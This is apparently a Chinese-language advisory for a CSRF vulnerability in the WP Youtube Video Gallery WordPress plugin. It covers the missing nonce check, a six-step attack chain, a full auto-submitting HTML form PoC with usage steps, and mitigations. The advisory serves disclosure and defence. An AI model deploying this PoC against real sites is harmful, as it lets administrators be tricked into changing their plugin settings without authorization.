CVE-2025-14906 | WP Youtube Video Gallery CSRF漏洞导致插件设置被篡改

漏洞信息

漏洞编号

CVE-2025-14906

漏洞类型

CSRF跨站请求伪造

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WP Youtube Video Gallery (WordPress插件)

漏洞概述

WP Youtube Video Gallery是WordPress平台上广受欢迎的视频画廊插件，允许用户轻松嵌入和管理YouTube视频内容。该插件在1.0及之前的所有版本中存在严重的跨站请求伪造（CSRF）漏洞。漏洞根源在于wpYTVideoGallerySettingSave()函数缺少Nonce令牌验证机制。攻击者可以利用这一缺陷，通过构造恶意请求诱导已登录的网站管理员点击链接，从而在管理员不知情的情况下修改插件的设置参数。由于该漏洞允许攻击者篡改插件配置，攻击者可能会将合法视频替换为恶意内容，实施钓鱼攻击或传播恶意软件。此外，攻击者还可能修改插件的显示设置、布局配置等，对网站的用户体验和安全性造成影响。此漏洞的CVSS评分为4.3，属于中等严重程度，主要因为其利用需要用户交互（管理员必须点击恶意链接），且对系统的机密性和完整性影响较低。尽管如此，该漏洞仍可能对使用该插件的WordPress网站造成安全风险，建议网站管理员尽快采取修复措施。

技术细节

该CSRF漏洞存在于WP Youtube Video Gallery插件的wpYTVideoGallerySettingSave()函数中。该函数负责处理插件设置的保存操作，但未对请求来源进行有效的Nonce令牌验证。在WordPress插件开发中，Nonce机制是防止CSRF攻击的标准安全措施，通过生成一次性令牌确保请求确实来自合法的管理后台操作。由于该函数缺少此验证，攻击者可以构造一个恶意HTML页面或链接，包含自动提交的表单请求。当网站管理员访问该页面或点击攻击者精心构造的链接时，浏览器会自动向目标WordPress站点发送设置保存请求。由于管理员已通过身份认证，请求会被服务器信任并执行，从而实现对插件设置的非法修改。攻击者可能修改的设置包括但不限于：默认视频源、显示参数、布局配置等。这种攻击不要求攻击者具备任何认证，攻击成功与否完全取决于目标管理员是否会触发恶意请求。攻击者通常会使用社会工程学手段，如伪装成正常邮件、消息或网页内容，诱导管理员点击恶意链接。

攻击链分析

STEP 1

步骤1

攻击者搭建包含恶意HTML表单的钓鱼页面，该表单自动向目标WordPress站点的admin-post.php提交设置修改请求

STEP 2

步骤2

攻击者使用社会工程学手段，通过邮件、社交媒体或即时通讯工具向网站管理员发送包含恶意链接的消息

STEP 3

步骤3

网站管理员在已登录WordPress后台的情况下点击了攻击者构造的恶意链接

STEP 4

步骤4

浏览器自动向目标站点发送POST请求，由于管理员已通过身份认证，服务器会执行wpYTVideoGallerySettingSave()函数

STEP 5

步骤5

由于该函数缺少Nonce验证，请求被服务器信任并执行，导致插件设置被非法修改

STEP 6

步骤6

攻击者成功篡改插件配置，可能将合法视频替换为恶意内容，实施进一步的攻击行为

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-14906 -->
<!-- Target: WP Youtube Video Gallery <= 1.0 -->
<!-- This PoC demonstrates how an attacker can modify plugin settings -->

<!DOCTYPE html>
<html>
<head>
    <title>Video Gallery Update</title>
</head>
<body>
    <h1>Video Gallery Settings</h1>
    <p>Please wait while we update your gallery settings...</p>
    
    <!-- Auto-submit form to exploit CSRF vulnerability -->
    <form id="csrfForm" 
          action="http://target-site.com/wp-admin/admin-post.php" 
          method="POST" 
          style="display:none;">
        
        <!-- Required WordPress form data -->
        <input type="hidden" name="action" value="wpYTVideoGallerySettingSave">
        <input type="hidden" name="wpYTVideoGallerySetting[gallery_title]" value="Malicious Video Gallery">
        <input type="hidden" name="wpYTVideoGallerySetting[gallery_layout]" value="malicious_layout">
        <input type="hidden" name="wpYTVideoGallerySetting[default_video_id]" value="VIDEO_ID">
        
        <!-- Additional settings can be modified -->
        <input type="hidden" name="wpYTVideoGallerySetting[display_count]" value="20">
        <input type="hidden" name="wpYTVideoGallerySetting[thumbnail_size]" value="medium">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
    </script>
</body>
</html>

<!-- 
Usage: 
1. Host this HTML page on attacker-controlled server
2. Trick WordPress admin into visiting the page or clicking a link
3. The form will automatically submit, modifying plugin settings
4. No authentication required from attacker side
-->

影响范围

WP Youtube Video Gallery <= 1.0

防御指南

临时缓解措施

在官方修复版本发布之前，网站管理员可以采取以下临时缓解措施：1）禁用或删除WP Youtube Video Gallery插件；2）限制管理员账户的使用，避免从不受信任的网络访问后台；3）启用浏览器的CSRF保护功能；4）使用安全插件（如Wordfence）监控异常的设置修改行为；5）定期检查插件目录是否有异常文件变更；6）对管理员进行安全意识培训，提醒不要点击来历不明的链接。建议持续关注官方安全公告，及时应用安全更新。